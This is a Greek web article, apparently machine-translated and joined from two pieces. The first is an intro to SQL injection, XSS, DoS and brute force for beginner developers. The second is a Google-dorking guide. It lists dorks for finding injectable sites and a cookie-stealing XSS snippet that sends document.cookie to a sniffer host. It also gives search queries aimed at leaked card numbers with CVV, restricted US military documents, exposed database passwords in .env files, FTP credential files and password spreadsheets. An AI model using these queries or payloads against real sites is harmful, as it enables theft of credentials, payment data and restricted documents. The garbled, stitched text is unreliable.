Αποφάσισα να μιλήσω λίγο για ασφάλεια πληροφοριών. Το άρθρο θα είναι χρήσιμο για αρχάριους προγραμματιστές και όσους μόλις άρχισαν να κάνουν την ανάπτυξη του Frontend. Ποιο είναι το πρόβλημα?
Πολλοί αρχάριοι προγραμματιστές είναι τόσο εθισμένοι στη σύνταξη κώδικα που ξεχνούν εντελώς την ασφάλεια της εργασίας τους. Και το πιο σημαντικό, ξεχνούν τέτοια τρωτά σημεία όπως το ερώτημα SQL, XXS. Επίσης, βρίσκουν εύκολους κωδικούς πρόσβασης για τα διοικητικά πάνελ τους και υπόκεινται σε ωμή βία. Ποιες είναι αυτές οι επιθέσεις και πώς μπορούν να αποφευχθούν;
SQL injection
Η έγχυση SQL είναι ο πιο κοινός τύπος επίθεσης σε βάση δεδομένων που πραγματοποιείται με ένα ερώτημα SQL για ένα συγκεκριμένο DBMS. Πολλοί άνθρωποι, ακόμη και μεγάλες εταιρείες υποφέρουν από τέτοιες επιθέσεις. Ο λόγος είναι το λάθος ενός προγραμματιστή κατά τη σύνταξη μιας βάσης δεδομένων και, στην πραγματικότητα, τα ερωτήματα SQL.
Μια επίθεση τύπου SQL injection είναι δυνατή λόγω εσφαλμένης επεξεργασίας των δεδομένων εισόδου που χρησιμοποιούνται σε ερωτήματα SQL. Με μια επιτυχημένη επίθεση από έναν χάκερ, διατρέχετε τον κίνδυνο να χάσετε όχι μόνο τα περιεχόμενα των βάσεων δεδομένων, αλλά και τους κωδικούς πρόσβασης και τα αρχεία καταγραφής του πίνακα διαχείρισης, αντίστοιχα. Και αυτά τα δεδομένα θα είναι αρκετά για να κατακτήσουν πλήρως τον ιστότοπο ή να κάνουν μη αναστρέψιμες προσαρμογές σε αυτόν.
Η επίθεση μπορεί να αναπαραχθεί με επιτυχία σε σενάρια γραμμένα σε PHP, ASP, Perl και άλλες γλώσσες. Η επιτυχία τέτοιων επιθέσεων εξαρτάται περισσότερο από το ποιο DBMS χρησιμοποιείται και από το πώς εφαρμόζεται το ίδιο το σενάριο. Υπάρχουν πολλοί ευάλωτοι ιστότοποι για ενέσεις SQL στον κόσμο. Αυτό είναι εύκολο να επαληθευτεί. Αρκεί να εισαγάγετε "dorks" - αυτά είναι ειδικά αιτήματα για την εύρεση ευάλωτων τοποθεσιών. Εδώ είναι μερικά από αυτά:
- inurl:index.php?id=
- inurl:trainers.php?id=
- inurl:buy.php?category=
- inurl:article.php?ID=
- inurl:play_old.php?id=
- inurl:declaration_more.php?decl_id=
- inurl:pageid=
- inurl:games.php?id=
- inurl:page.php?file=
- inurl:newsDetail.php?id=
- inurl:gallery.php?id=
- inurl:article.php?id=
Πώς να τα χρησιμοποιήσετε; Αρκεί να τα εισάγετε μηχανή αναζήτησης Googleή Yandex. Η μηχανή αναζήτησης θα σας δώσει όχι μόνο έναν ευάλωτο ιστότοπο, αλλά και μια σελίδα για αυτήν την ευπάθεια. Αλλά δεν θα σταματήσουμε εκεί και θα βεβαιωθούμε ότι η σελίδα είναι πραγματικά ευάλωτη. Για αυτό, αρκεί να βάλετε ένα μόνο εισαγωγικό «‘» μετά την τιμή «id=1». Κάτι σαν αυτό:
- inurl:games.php?id=1'
Και ο ιστότοπος θα μας δώσει ένα σφάλμα σχετικά με το ερώτημα SQL. Τι χρειάζεται στη συνέχεια ο χάκερ μας;
Και τότε χρειάζεται αυτόν τον σύνδεσμο προς τη σελίδα με ένα σφάλμα. Στη συνέχεια, η εργασία για την ευπάθεια στις περισσότερες περιπτώσεις λαμβάνει χώρα στη διανομή "Kali linux" με τα βοηθητικά προγράμματα για αυτό το μέρος: την εισαγωγή του κώδικα έγχυσης και την εκτέλεση των απαραίτητων λειτουργιών. Πώς θα συμβεί αυτό, δεν μπορώ να σας πω. Αλλά μπορείτε να βρείτε πληροφορίες σχετικά με αυτό στο Διαδίκτυο.
Επίθεση XSS
Αυτός ο τύπος επίθεσης πραγματοποιείται σε cookies. Αυτοί, με τη σειρά τους, τους αρέσει πολύ να σώζουν χρήστες. Γιατί όχι? Πώς χωρίς αυτούς; Εξάλλου, χάρη στα Cookies, δεν εισάγουμε έναν κωδικό πρόσβασης από το Vk.com ή το Mail.ru εκατό φορές. Και λίγοι είναι αυτοί που τα αρνούνται. Αλλά στο Διαδίκτυο, εμφανίζεται συχνά ένας κανόνας για τους χάκερ: ο συντελεστής ευκολίας είναι ευθέως ανάλογος με τον συντελεστή ανασφάλειας.
Για να εφαρμόσει μια επίθεση XSS, ο χάκερ μας χρειάζεται γνώση JavaScript. Η γλώσσα με την πρώτη ματιά είναι πολύ απλή και ακίνδυνη, γιατί δεν έχει πρόσβαση σε πόρους υπολογιστή. Ένας χάκερ μπορεί να εργαστεί με JavaScript μόνο σε πρόγραμμα περιήγησης, αλλά αυτό είναι αρκετό. Μετά από όλα, το κύριο πράγμα είναι να εισαγάγετε τον κωδικό στην ιστοσελίδα.
Δεν θα μπω σε λεπτομέρειες σχετικά με τη διαδικασία επίθεσης. Θα πω μόνο τα βασικά και το νόημα του πώς συμβαίνει αυτό.
Ένας χάκερ μπορεί να προσθέσει κώδικα JS σε κάποιο φόρουμ ή βιβλίο επισκεπτών:
Τα σενάρια μάς ανακατευθύνουν σε μια μολυσμένη σελίδα όπου θα εκτελεστεί ο κώδικας: είτε πρόκειται για sniffer, κάποιο είδος αποθήκευσης είτε για εκμετάλλευση που θα κλέψει με κάποιο τρόπο τα Cookies μας από την κρυφή μνήμη.
Γιατί JavaScript; Επειδή η JavaScript είναι εξαιρετική με αιτήματα ιστού και έχει πρόσβαση σε cookies. Αλλά αν το σενάριό μας μας μεταφέρει σε κάποιο site, τότε ο χρήστης θα το παρατηρήσει εύκολα. Εδώ, ο χάκερ χρησιμοποιεί μια πιο πονηρή επιλογή - εισάγει απλώς τον κωδικό στην εικόνα.
Img=newImage();
Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;
Απλώς δημιουργούμε μια εικόνα και της αναθέτουμε το σενάριό μας ως διεύθυνση.
Πώς να προστατευτείτε από όλα αυτά; Πολύ απλό - μην ακολουθείτε ύποπτους συνδέσμους.
Επιθέσεις DoS και DDos
DoS (από το αγγλικό Denial of Service - Η άρνηση υπηρεσίας είναι μια επίθεση χάκερ σε ένα σύστημα υπολογιστή με σκοπό την αποτυχία του. Πρόκειται για τη δημιουργία τέτοιων συνθηκών υπό τις οποίες οι ευσυνείδητοι χρήστες του συστήματος δεν μπορούν να έχουν πρόσβαση στους παρεχόμενους πόρους του συστήματος (διακομιστές), ή αυτή η πρόσβαση είναι δύσκολη. Μια αποτυχία συστήματος μπορεί επίσης να είναι ένα βήμα προς την αποτύπωσή της εάν, σε περίπτωση έκτακτης ανάγκης, το λογισμικό παρέχει κρίσιμες πληροφορίες: για παράδειγμα, έκδοση, εξάρτημα κώδικα προγράμματοςκλπ. Αλλά τις περισσότερες φορές είναι ένα μέτρο οικονομικής πίεσης: η απώλεια μιας απλής υπηρεσίας που παράγει εισόδημα. Οι λογαριασμοί από τον πάροχο ή τα μέτρα για την αποφυγή της επίθεσης χτυπούν σημαντικά τον "στόχο" στην τσέπη. Επί του παρόντος, οι επιθέσεις DoS και DDoS είναι οι πιο δημοφιλείς, καθώς σας επιτρέπουν να φέρετε σχεδόν οποιοδήποτε σύστημα σε αποτυχία χωρίς να αφήνετε νομικά σημαντικά στοιχεία.
Ποια είναι η διαφορά μεταξύ των επιθέσεων DoS και DDos;
Το DoS είναι μια επίθεση κατασκευασμένη με έξυπνο τρόπο. Για παράδειγμα, εάν ο διακομιστής δεν ελέγξει την ορθότητα των εισερχόμενων πακέτων, τότε ένας χάκερ μπορεί να υποβάλει ένα τέτοιο αίτημα που θα υποβάλλεται σε επεξεργασία για πάντα και δεν θα υπάρχει αρκετός χρόνος επεξεργαστή για να εργαστεί με άλλες συνδέσεις. Αντίστοιχα, οι πελάτες θα λάβουν άρνηση εξυπηρέτησης. Αλλά δεν θα λειτουργήσει η υπερφόρτωση ή η απενεργοποίηση μεγάλων γνωστών τοποθεσιών με αυτόν τον τρόπο. Είναι οπλισμένοι με αρκετά μεγάλα κανάλια και εξαιρετικά ισχυρούς διακομιστές που μπορούν εύκολα να αντιμετωπίσουν μια τέτοια υπερφόρτωση.
Το DDoS είναι στην πραγματικότητα η ίδια επίθεση με το DoS. Αλλά αν στο DoS υπάρχει ένα πακέτο αιτήματος, τότε στο DDoS μπορεί κάλλιστα να υπάρχουν εκατοντάδες ή περισσότερα από αυτά. Ακόμη και οι διακομιστές βαρέως τύπου μπορεί να μην είναι σε θέση να αντιμετωπίσουν μια τέτοια υπερφόρτωση. Θα σας δώσω ένα παράδειγμα.
Μια επίθεση DoS είναι όταν συνομιλείτε με κάποιον, αλλά μετά έρχεται κάποιος κακότροπος και αρχίζει να ουρλιάζει δυνατά. Η συζήτηση είναι είτε αδύνατη είτε πολύ δύσκολη. Λύση: καλέστε την ασφάλεια, η οποία θα ηρεμήσει και θα βγάλει το άτομο από το δωμάτιο. Οι επιθέσεις DDoS είναι όταν χιλιάδες τέτοιοι κακομαθημένοι άνθρωποι τρέχουν μέσα. Σε αυτή την περίπτωση, οι φύλακες δεν θα μπορούν να στρίψουν και να τους απομακρύνουν όλους.
Τα DoS και DDoS παράγονται από υπολογιστές, τα λεγόμενα ζόμπι. Πρόκειται για υπολογιστές χρηστών που έχουν παραβιαστεί από χάκερ που δεν υποψιάζονται καν ότι το μηχάνημά τους εμπλέκεται στην επίθεση οποιουδήποτε διακομιστή.
Πώς να προστατευτείτε από αυτό; Γενικά, σε καμία περίπτωση. Αλλά μπορείτε να περιπλέκετε το έργο ενός χάκερ. Για να το κάνετε αυτό, πρέπει να επιλέξετε μια καλή φιλοξενία με ισχυρούς διακομιστές.
Βίαιη επίθεση
Ένας προγραμματιστής μπορεί να βρει πολλά συστήματα προστασίας από επιθέσεις, να ελέγξει πλήρως τα σενάρια που έχουμε γράψει, να ελέγξει τον ιστότοπο για τρωτά σημεία κ.λπ. Αλλά όταν πρόκειται για το τελευταίο βήμα της διάταξης του ιστότοπου, δηλαδή όταν θα τοποθετήσει απλώς έναν κωδικό πρόσβασης στον πίνακα διαχείρισης, μπορεί να ξεχάσει ένα πράγμα. Κωδικός πρόσβασης!
Δεν συνιστάται ανεπιφύλακτα να ορίσετε έναν απλό κωδικό πρόσβασης. Μπορεί να είναι 12345, 1114457, vasya111 κ.λπ. Δεν συνιστάται ο ορισμός κωδικών πρόσβασης με μήκος μικρότερο από 10-11 χαρακτήρες. Διαφορετικά, μπορεί να υποβληθείτε στην πιο συνηθισμένη και όχι πολύπλοκη επίθεση - Brute Force.
Το Brute Force είναι μια επίθεση brute-force με κωδικό πρόσβασης που βασίζεται σε λεξικό ειδικά προγράμματα. Τα λεξικά μπορεί να είναι διαφορετικά: Λατινικά, ταξινόμηση κατά αριθμούς, ας πούμε μέχρι κάποιο εύρος, μικτά (Λατινικά + αριθμοί), και υπάρχουν ακόμη και λεξικά με μοναδικά σύμβολα @#4$%&*~~`'”\ ? και τα λοιπά.
Φυσικά, αυτού του είδους η επίθεση είναι εύκολο να αποφευχθεί.Αρκεί να βρείτε έναν περίπλοκο κωδικό πρόσβασης. Ακόμα και το captcha μπορεί να σας σώσει. Και επίσης, εάν ο ιστότοπός σας είναι κατασκευασμένος σε CMS, τότε πολλοί από αυτούς υπολογίζουν παρόμοιο τύπο επίθεσης και αποκλείουν την ip. Πρέπει πάντα να θυμόμαστε ότι όσο περισσότεροι διαφορετικοί χαρακτήρες στον κωδικό πρόσβασης, τόσο πιο δύσκολο είναι να τον παραλάβετε.
Πώς λειτουργούν οι χάκερ; Στις περισσότερες περιπτώσεις, είτε υποπτεύονται είτε γνωρίζουν ήδη μέρος του κωδικού πρόσβασης. Είναι πολύ λογικό να υποθέσουμε ότι ο κωδικός πρόσβασης του χρήστη σίγουρα δεν θα αποτελείται από 3 ή 5 χαρακτήρες. Τέτοιοι κωδικοί πρόσβασης οδηγούν σε συχνές εισβολές. Βασικά, οι χάκερ παίρνουν μια σειρά από 5 έως 10 χαρακτήρες και προσθέτουν μερικούς χαρακτήρες εκεί που πιθανώς γνωρίζουν εκ των προτέρων. Στη συνέχεια, δημιουργήστε κωδικούς πρόσβασης με τα επιθυμητά εύρη. Η διανομή Kali linux έχει ακόμη και προγράμματα για τέτοιες περιπτώσεις. Και voila, η επίθεση δεν θα διαρκέσει πλέον πολύ, αφού ο όγκος του λεξικού δεν είναι πλέον τόσο μεγάλος. Επιπλέον, ένας χάκερ μπορεί να χρησιμοποιήσει την ισχύ της κάρτας βίντεο. Ορισμένα από αυτά υποστηρίζουν το σύστημα CUDA, ενώ η ταχύτητα απαρίθμησης αυξάνεται έως και 10 φορές. Και τώρα βλέπουμε ότι μια επίθεση με τόσο απλό τρόπο είναι αρκετά πραγματική. Αλλά όχι μόνο οι τοποθεσίες υπόκεινται σε ωμή βία.
Αγαπητοί προγραμματιστές, μην ξεχνάτε ποτέ το σύστημα ασφάλειας πληροφοριών, γιατί σήμερα πολλοί άνθρωποι, συμπεριλαμβανομένων των κρατών, υποφέρουν από τέτοιου είδους επιθέσεις. Εξάλλου, η μεγαλύτερη ευπάθεια είναι ένα άτομο που μπορεί πάντα να αποσπάται κάπου ή να παραβλέπει κάπου. Είμαστε προγραμματιστές, αλλά όχι προγραμματισμένες μηχανές. Να είστε πάντα σε εγρήγορση, γιατί η απώλεια πληροφοριών απειλεί με σοβαρές συνέπειες!
Η λήψη ιδιωτικών δεδομένων δεν σημαίνει πάντα hacking - μερικές φορές δημοσιεύεται σε δημόσιο τομέα. Η γνώση των ρυθμίσεων της Google και λίγη εφευρετικότητα θα σας επιτρέψει να βρείτε πολλά ενδιαφέροντα πράγματα - από αριθμούς πιστωτικών καρτών μέχρι έγγραφα του FBI.
ΠΡΟΕΙΔΟΠΟΙΗΣΗ
Όλες οι πληροφορίες παρέχονται μόνο για ενημερωτικούς σκοπούς. Ούτε οι συντάκτες ούτε ο συγγραφέας ευθύνονται για οποιαδήποτε πιθανή βλάβη που προκαλείται από τα υλικά αυτού του άρθρου.Τα πάντα είναι συνδεδεμένα στο Διαδίκτυο σήμερα, ελάχιστα νοιάζονται για τον περιορισμό της πρόσβασης. Ως εκ τούτου, πολλά ιδιωτικά δεδομένα γίνονται θήραμα των μηχανών αναζήτησης. Τα ρομπότ Spider δεν περιορίζονται πλέον σε ιστοσελίδες, αλλά ευρετηριάζουν όλο το περιεχόμενο που είναι διαθέσιμο στον Ιστό και προσθέτουν συνεχώς εμπιστευτικές πληροφορίες στις βάσεις δεδομένων τους. Η εκμάθηση αυτών των μυστικών είναι εύκολη - απλά πρέπει να ξέρετε πώς να τα ρωτάτε.
Αναζήτηση αρχείων
Σε ικανά χέρια, η Google θα βρει γρήγορα οτιδήποτε είναι κακό στον Ιστό, όπως προσωπικά στοιχεία και αρχεία για επίσημη χρήση. Συχνά είναι κρυμμένα σαν ένα κλειδί κάτω από ένα χαλί: δεν υπάρχουν πραγματικοί περιορισμοί πρόσβασης, τα δεδομένα βρίσκονται απλώς στο πίσω μέρος του ιστότοπου, όπου οι σύνδεσμοι δεν οδηγούν. Η τυπική διεπαφή ιστού Google παρέχει μόνο βασικές ρυθμίσεις σύνθετης αναζήτησης, αλλά ακόμη και αυτές θα είναι αρκετές.
Υπάρχουν δύο τελεστές που μπορείτε να χρησιμοποιήσετε για να περιορίσετε τις αναζητήσεις Google σε αρχεία συγκεκριμένου τύπου: filetype και ext . Το πρώτο ορίζει τη μορφή που καθορίζει η μηχανή αναζήτησης από την κεφαλίδα του αρχείου, το δεύτερο - την επέκταση αρχείου, ανεξάρτητα από το εσωτερικό του περιεχόμενο. Κατά την αναζήτηση και στις δύο περιπτώσεις, πρέπει να καθορίσετε μόνο την επέκταση. Αρχικά, ο τελεστής ext ήταν βολικός στη χρήση σε περιπτώσεις όπου δεν υπήρχαν συγκεκριμένα χαρακτηριστικά μορφής για το αρχείο (για παράδειγμα, για αναζήτηση αρχείων διαμόρφωσης ini και cfg, μέσα στα οποία μπορεί να υπάρχει οτιδήποτε). Τώρα οι αλγόριθμοι της Google έχουν αλλάξει και δεν υπάρχει ορατή διαφορά μεταξύ των χειριστών - τα αποτελέσματα είναι τα ίδια στις περισσότερες περιπτώσεις.
Φιλτράρισμα της εξόδου
Από προεπιλογή, το Google αναζητά λέξεις και γενικά για τυχόν χαρακτήρες που έχουν εισαχθεί σε όλα τα αρχεία σε σελίδες με ευρετήριο. Μπορείτε να περιορίσετε το εύρος αναζήτησης από τον τομέα ανώτατου επιπέδου, έναν συγκεκριμένο ιστότοπο ή από τη θέση της επιθυμητής ακολουθίας στα ίδια τα αρχεία. Για τις δύο πρώτες επιλογές, χρησιμοποιείται η δήλωση τοποθεσίας, ακολουθούμενη από το όνομα του τομέα ή της επιλεγμένης τοποθεσίας. Στην τρίτη περίπτωση, ένα ολόκληρο σύνολο τελεστών σάς επιτρέπει να αναζητήσετε πληροφορίες σε πεδία υπηρεσιών και μεταδεδομένα. Για παράδειγμα, το allinurl θα βρει το καθορισμένο στο σώμα των ίδιων των συνδέσμων, allinanchor - στο κείμενο που παρέχεται με την ετικέτα , allintitle - στις κεφαλίδες σελίδας, allintext - στο σώμα των σελίδων.
Για κάθε χειριστή υπάρχει μια πιο ελαφριά έκδοση με μικρότερο όνομα (χωρίς το πρόθεμα all). Η διαφορά είναι ότι το allinurl θα βρει συνδέσμους με όλες τις λέξεις, ενώ το inurl θα βρει συνδέσμους μόνο με την πρώτη από αυτές. Η δεύτερη και οι επόμενες λέξεις από το ερώτημα μπορούν να εμφανιστούν οπουδήποτε στις ιστοσελίδες. Ο τελεστής inurl διαφέρει επίσης από έναν άλλο παρόμοιο στη σημασία - τοποθεσία . Το πρώτο σάς επιτρέπει επίσης να βρείτε οποιαδήποτε ακολουθία χαρακτήρων στον σύνδεσμο προς το επιθυμητό έγγραφο (για παράδειγμα, /cgi-bin/), το οποίο χρησιμοποιείται ευρέως για την εύρεση στοιχείων με γνωστά τρωτά σημεία.
Ας το δοκιμάσουμε στην πράξη. Παίρνουμε το φίλτρο allintext και κάνουμε το ερώτημα να επιστρέψει μια λίστα με αριθμούς πιστωτικών καρτών και κωδικούς επαλήθευσης, η οποία θα λήξει μόνο μετά από δύο χρόνια (ή όταν οι ιδιοκτήτες τους κουραστούν να ταΐζουν τους πάντες στη σειρά).
Allintext: ημερομηνία λήξης αριθμού κάρτας /2017 cvv 
Όταν διαβάζετε στις ειδήσεις ότι ένας νεαρός χάκερ «παραβίασε τους διακομιστές» του Πενταγώνου ή της NASA, κλέβοντας απόρρητες πληροφορίες, τότε στις περισσότερες περιπτώσεις είναι ακριβώς αυτή η στοιχειώδης τεχνική χρήσης της Google. Ας υποθέσουμε ότι μας ενδιαφέρει μια λίστα με τους υπαλλήλους της NASA και τα στοιχεία επικοινωνίας τους. Σίγουρα μια τέτοια λίστα είναι σε ηλεκτρονική μορφή. Για ευκολία ή λόγω παράβλεψης, μπορεί επίσης να βρίσκεται στον ίδιο τον ιστότοπο του οργανισμού. Είναι λογικό ότι σε αυτή την περίπτωση δεν θα υπάρχουν αναφορές σε αυτό, αφού προορίζεται για εσωτερική χρήση. Ποιες λέξεις μπορεί να υπάρχουν σε ένα τέτοιο αρχείο; Τουλάχιστον - το πεδίο "διεύθυνση". Είναι εύκολο να ελέγξουμε όλες αυτές τις υποθέσεις.
inurl:nasa.gov τύπος αρχείου:xlsx "διεύθυνση"
Χρησιμοποιούμε γραφειοκρατία
Τέτοια ευρήματα είναι ένα ευχάριστο ασήμαντο. Η πραγματικά ισχυρή σύλληψη προέρχεται από μια πιο λεπτομερή γνώση του Google Webmaster Operators, του ίδιου του Ιστού και της δομής αυτού που αναζητάτε. Γνωρίζοντας τις λεπτομέρειες, μπορείτε εύκολα να φιλτράρετε την έξοδο και να βελτιώσετε τις ιδιότητες των αρχείων που χρειάζεστε για να λάβετε πραγματικά πολύτιμα δεδομένα στα υπόλοιπα. Είναι αστείο που η γραφειοκρατία έρχεται να σώσει εδώ. Παράγει τυπικές συνθέσεις που διευκολύνουν την αναζήτηση μυστικών πληροφοριών που έχουν διαρρεύσει κατά λάθος στον Ιστό.
Για παράδειγμα, η δήλωση Distribution, η οποία είναι υποχρεωτική στο γραφείο του Υπουργείου Άμυνας των ΗΠΑ, σημαίνει τυποποιημένους περιορισμούς στη διανομή ενός εγγράφου. Το γράμμα Α σηματοδοτεί δημόσιες εκδόσεις στις οποίες δεν υπάρχει τίποτα μυστικό. B - προορίζεται μόνο για εσωτερική χρήση, C - αυστηρά εμπιστευτικό, και ούτω καθεξής μέχρι F. Ξεχωριστά, υπάρχει το γράμμα X, το οποίο σηματοδοτεί ιδιαίτερα πολύτιμες πληροφορίες που αντιπροσωπεύουν ένα κρατικό μυστικό ανώτατου επιπέδου. Ας αναζητήσουν τέτοια έγγραφα όσοι υποτίθεται ότι θα το κάνουν εν ώρα υπηρεσίας και θα περιοριστούμε σε αρχεία με το γράμμα C. Σύμφωνα με το DoDI 5230.24, αυτή η σήμανση αποδίδεται σε έγγραφα που περιέχουν περιγραφή κρίσιμων τεχνολογιών που εμπίπτουν στον έλεγχο των εξαγωγών. Μπορείτε να βρείτε τέτοιες προσεκτικά φυλαγμένες πληροφορίες σε ιστότοπους στον τομέα ανώτατου επιπέδου .mil που έχει εκχωρηθεί στον Στρατό των ΗΠΑ.
"ΔΗΛΩΣΗ ΔΙΑΝΟΜΗΣ Γ" inurl:navy.mil 
Είναι πολύ βολικό να συλλέγονται στον τομέα .mil μόνο ιστότοποι από το Υπουργείο Άμυνας των ΗΠΑ και τους συμβατικούς οργανισμούς του. Τα αποτελέσματα αναζήτησης με περιορισμό τομέα είναι εξαιρετικά καθαρά και οι τίτλοι μιλούν από μόνοι τους. Είναι πρακτικά άχρηστο να αναζητάς ρωσικά μυστικά με αυτόν τον τρόπο: το χάος επικρατεί στους τομείς .ru και .rf και τα ονόματα πολλών οπλικών συστημάτων ακούγονται σαν βοτανικά (PP "Kiparis", αυτοκινούμενα όπλα "Acacia") ή ακόμα και υπέροχο (TOS "Pinocchio").
Εξετάζοντας προσεκτικά οποιοδήποτε έγγραφο από έναν ιστότοπο στον τομέα .mil, μπορείτε να δείτε άλλους δείκτες για να κάνετε πιο συγκεκριμένη την αναζήτησή σας. Για παράδειγμα, μια αναφορά στους περιορισμούς εξαγωγής "Sec 2751", που είναι επίσης βολικό να αναζητήσετε ενδιαφέρουσες τεχνικές πληροφορίες. Κατά καιρούς, αφαιρείται από τους επίσημους ιστότοπους, όπου εμφανιζόταν κάποτε, επομένως εάν δεν μπορείτε να ακολουθήσετε έναν ενδιαφέρον σύνδεσμο στα αποτελέσματα αναζήτησης, χρησιμοποιήστε την προσωρινή μνήμη Google (χειριστή προσωρινής μνήμης) ή τον ιστότοπο του Internet Archive.
Ανεβαίνουμε στα σύννεφα
Εκτός από τα κατά λάθος αποχαρακτηρισμένα έγγραφα από κυβερνητικές υπηρεσίες, στην κρυφή μνήμη Google εμφανίζονται περιστασιακά σύνδεσμοι προς προσωπικά αρχεία από το Dropbox και άλλες υπηρεσίες αποθήκευσης δεδομένων που δημιουργούν "ιδιωτικούς" συνδέσμους σε δημόσια δημοσιευμένα δεδομένα. Είναι ακόμα χειρότερο με εναλλακτικές και αυτοδημιούργητες υπηρεσίες. Για παράδειγμα, το ακόλουθο ερώτημα βρίσκει τα δεδομένα όλων των πελατών της Verizon που έχουν εγκατεστημένο διακομιστή FTP και χρησιμοποιούν ενεργά έναν δρομολογητή στο δρομολογητή τους.
Allinurl:ftp://verizon.net
Υπάρχουν τώρα περισσότεροι από σαράντα χιλιάδες τέτοιοι έξυπνοι άνθρωποι και την άνοιξη του 2015 υπήρχαν μια τάξη μεγέθους περισσότεροι. Αντί για το Verizon.net, μπορείτε να αντικαταστήσετε το όνομα οποιουδήποτε γνωστού παρόχου και όσο πιο διάσημο είναι, τόσο μεγαλύτερο μπορεί να είναι το αλίευμα. Μέσω του ενσωματωμένου διακομιστή FTP, μπορείτε να δείτε αρχεία σε μια εξωτερική μονάδα δίσκου που είναι συνδεδεμένη στο δρομολογητή. Συνήθως αυτό είναι ένα NAS για απομακρυσμένη εργασία, ένα προσωπικό σύννεφο ή κάποιο είδος λήψης αρχείων peer-to-peer. Όλο το περιεχόμενο τέτοιων μέσων ευρετηριάζεται από την Google και άλλες μηχανές αναζήτησης, ώστε να μπορείτε να έχετε πρόσβαση σε αρχεία που είναι αποθηκευμένα σε εξωτερικές μονάδες δίσκου μέσω απευθείας συνδέσμου.
Παραμετροποίηση παραμέτρων
Πριν από τη χονδρική μετανάστευση στα σύννεφα, απλοί διακομιστές FTP, οι οποίοι δεν είχαν επίσης τρωτά σημεία, κυριαρχούσαν ως απομακρυσμένοι αποθηκευτικοί χώροι. Πολλά από αυτά εξακολουθούν να είναι επίκαιρα σήμερα. Για παράδειγμα, το δημοφιλές πρόγραμμα WS_FTP Professional αποθηκεύει δεδομένα διαμόρφωσης, λογαριασμούς χρήστη και κωδικούς πρόσβασης στο αρχείο ws_ftp.ini. Είναι εύκολο να βρεθεί και να διαβαστεί επειδή όλες οι καταχωρήσεις αποθηκεύονται σε απλό κείμενο και οι κωδικοί πρόσβασης κρυπτογραφούνται χρησιμοποιώντας τον αλγόριθμο Triple DES μετά από ελάχιστη συσκότιση. Στις περισσότερες εκδόσεις, αρκεί απλώς η απόρριψη του πρώτου byte.
Η αποκρυπτογράφηση τέτοιων κωδικών πρόσβασης είναι εύκολη χρησιμοποιώντας το βοηθητικό πρόγραμμα WS_FTP Password Decryptor ή μια δωρεάν υπηρεσία web.
Όταν μιλάμε για παραβίαση ενός αυθαίρετου ιστότοπου, συνήθως εννοούν τη λήψη κωδικού πρόσβασης από αρχεία καταγραφής και αντίγραφα ασφαλείας του CMS ή των αρχείων διαμόρφωσης εφαρμογών ηλεκτρονικού εμπορίου. Εάν γνωρίζετε την τυπική δομή τους, μπορείτε εύκολα να υποδείξετε λέξεις-κλειδιά. Γραμμές όπως αυτές που βρίσκονται στο ws_ftp.ini είναι εξαιρετικά κοινές. Για παράδειγμα, το Drupal και το PrestaShop έχουν πάντα ένα αναγνωριστικό χρήστη (UID) και έναν αντίστοιχο κωδικό πρόσβασης (pwd) και όλες οι πληροφορίες αποθηκεύονται σε αρχεία με την επέκταση .inc. Μπορείτε να τα αναζητήσετε ως εξής:
"pwd=" "UID=" ext:inc
Αποκαλύπτουμε κωδικούς πρόσβασης από το DBMS
Στα αρχεία διαμόρφωσης των διακομιστών SQL, τα ονόματα χρηστών και οι διευθύνσεις ηλεκτρονικού ταχυδρομείου αποθηκεύονται σε καθαρό κείμενο και αντί για κωδικούς πρόσβασης, καταγράφονται οι κατακερματισμοί MD5 τους. Η αποκρυπτογράφηση τους, αυστηρά μιλώντας, είναι αδύνατη, αλλά μπορείτε να βρείτε ένα ταίριασμα μεταξύ γνωστών ζευγών κατακερματισμού-κωδικού πρόσβασης.
Μέχρι τώρα, υπάρχουν DBMS που δεν χρησιμοποιούν καν κατακερματισμό κωδικού πρόσβασης. Τα αρχεία ρυθμίσεων οποιουδήποτε από αυτά μπορούν απλά να προβληθούν στο πρόγραμμα περιήγησης.
Intext:DB_PASSWORD τύπος αρχείου:env
Με την εμφάνιση στους διακομιστές θέση παραθύρωντα αρχεία ρυθμίσεων κατέλαβαν εν μέρει το μητρώο. Μπορείτε να κάνετε αναζήτηση στους κλάδους του με τον ίδιο ακριβώς τρόπο, χρησιμοποιώντας το reg ως τύπο αρχείου. Για παράδειγμα, όπως αυτό:
Τύπος αρχείου:reg HKEY_CURRENT_USER "Κωδικός πρόσβασης"=
Μην ξεχνάτε το προφανές
Μερικές φορές είναι δυνατό να φτάσετε σε απόρρητες πληροφορίες με τη βοήθεια δεδομένων που ανοίχτηκαν κατά λάθος και εντοπίστηκαν από την Google. Η ιδανική επιλογή είναι να βρείτε μια λίστα με κωδικούς πρόσβασης σε κάποια κοινή μορφή. Μόνο οι απελπισμένοι άνθρωποι μπορούν να αποθηκεύσουν πληροφορίες λογαριασμού σε ένα αρχείο κειμένου, ένα έγγραφο Word ή ένα υπολογιστικό φύλλο Excel, αλλά υπάρχουν πάντα αρκετές από αυτές.
Τύπος αρχείου:xls inurl:password
Από τη μία πλευρά, υπάρχουν πολλά μέσα για την αποτροπή τέτοιων περιστατικών. Είναι απαραίτητο να καθορίσετε επαρκή δικαιώματα πρόσβασης στο htaccess, να επιδιορθώσετε το CMS, να μην χρησιμοποιείτε αριστερά σενάρια και να κλείσετε άλλες τρύπες. Υπάρχει επίσης ένα αρχείο με λίστα εξαιρέσεων robots.txt, το οποίο απαγορεύει στις μηχανές αναζήτησης να ευρετηριάσουν τα αρχεία και τους καταλόγους που καθορίζονται σε αυτό. Από την άλλη, εάν η δομή robots.txt σε κάποιον διακομιστή διαφέρει από την τυπική, τότε γίνεται αμέσως σαφές τι προσπαθούν να κρύψουν σε αυτόν.
Η λίστα των καταλόγων και των αρχείων σε οποιονδήποτε ιστότοπο προηγείται από το τυπικό ευρετήριο επιγραφής του. Εφόσον πρέπει να εμφανίζεται στον τίτλο για λόγους υπηρεσίας, είναι λογικό να περιορίζεται η αναζήτησή του στον τελεστή του τίτλου. Μπορείτε να βρείτε ενδιαφέροντα πράγματα στους καταλόγους /admin/, /personal/, /etc/ ακόμα και /secret/.
Ακολουθήστε τις ενημερώσεις
